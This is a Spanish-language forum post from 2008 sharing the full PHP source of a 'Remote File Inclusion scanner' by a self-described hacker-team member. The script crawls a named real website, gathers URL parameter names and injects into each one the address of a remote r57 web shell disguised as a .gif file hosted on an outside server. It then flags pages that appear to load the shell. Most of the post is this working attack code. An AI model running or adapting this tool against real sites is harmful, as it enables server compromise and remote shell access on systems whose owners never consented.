RFI Scanner [PHP]

**alienmaster** · 04-10-2008, 13:47

Lo programe hace bastante tiempo, me habia olvidado de el hasta ayer que lo encontre y decidid publicar el codigo :P

Mas informacion: http://www.elefren.com/blog/RFI-Scanner-en-PHP/

Saludos, elefrEn

Código:

<?
/*
RFI Scanner 1.0
Author: elefrEn
Website: http://elefren.com/
email: [email protected]

Dedicated to Spanish Hackers Team - http://spanish-hackers.com/
Gr33tz: -> JosS | nhh-32 | Omega <-
*/

set_time_limit(0);

#Config
$urlweb = "www.guia-ubuntu.org";# Out http://, ex: google.com
$urlshell = "http://usuarios.lycos.es/w0rms/r57.gif";# Url where you sent the shell script
$comunvars = "cual|admindir|sec|id|file|doc|module|modulo|name";# Comun vars vulns to RFI in cms´s, etc...
$filetoscan = "index.php";# The file that you want scan

#Funcs
function vars($url){
	$xpl = parse_url($url);$xpl = $xpl[query];$xpl = explode("&",$xpl);
	$var = 0;
	while($var < count($xpl)){
		$v4r = explode("=",$xpl[$var]);
		$m0s .= '|'.$v4r[0];
		$var++;
	}
	$m0s = str_replace('amp;','',$m0s);
	return $m0s;
}
function beerres($list, $barras = FALSE){
	$s3p4 = '<br>';
	if($barras) $s3p4 = '|';
	$list = explode('|',$list);
	$var = 0;
	while($var < count($list)){
		if($list[$var] != ''){
			if(!@preg_match("/$list[$var]/i",$m0s) ){
				$m0s .= $list[$var].$s3p4;
			}
		}
		$var++;
	}
	return $m0s;
}
function extrac($n00b, $file = FALSE){
	$n0ob = 'http://'.$n00b;
	$source = join("",file(&$n0ob));
	$vars = preg_match_all('/<a href="'.$file.'(.*)">(.*)<\/a>/i',$source,$results);
	$t0t = count($results[1]);
	$var = 0;
	while($var < $t0t){
		$xtr = explode('"',$results[1][$var]);
		$urllist .= $xtr[0].'|';
		$varlist .= vars($xtr[0]);
		$var++;
	}
	$m0s .= $varlist;
	return beerres($m0s,1);
}
function rfi($vars,$web,$file,$urlshell){
	$list = explode('|',$vars);
	$var = 0;
	while($var < count($list)){
		$url = $web.$file."?".$list[$var]."=".$urlshell."?";
		$source = join("",file(&$url));
		if(preg_match("/shell/i",$source)){
			$m0s .= "<font color=red><b>RFI-></b></font> ";
		}else{
			$m0s .= "<font color=green><b>Secure-></b></font> ";
		}
		$m0s .= $url.'<br>';
		$var++;
	}
	return $m0s;
}

#Exec
echo rfi(extrac($urlweb).$comunvars,'http://'.$urlweb.'/',$filetoscan,$urlshell);
?>

RFI Scanner [PHP]

Herramientas

Visualizar

Ver modo hilado

Temas similares

scanner necesito

Port Scanner

Scanner Vulnerabilidades

Ayuda con Scanner

LANguard Network Scanner

Marcadores

Marcadores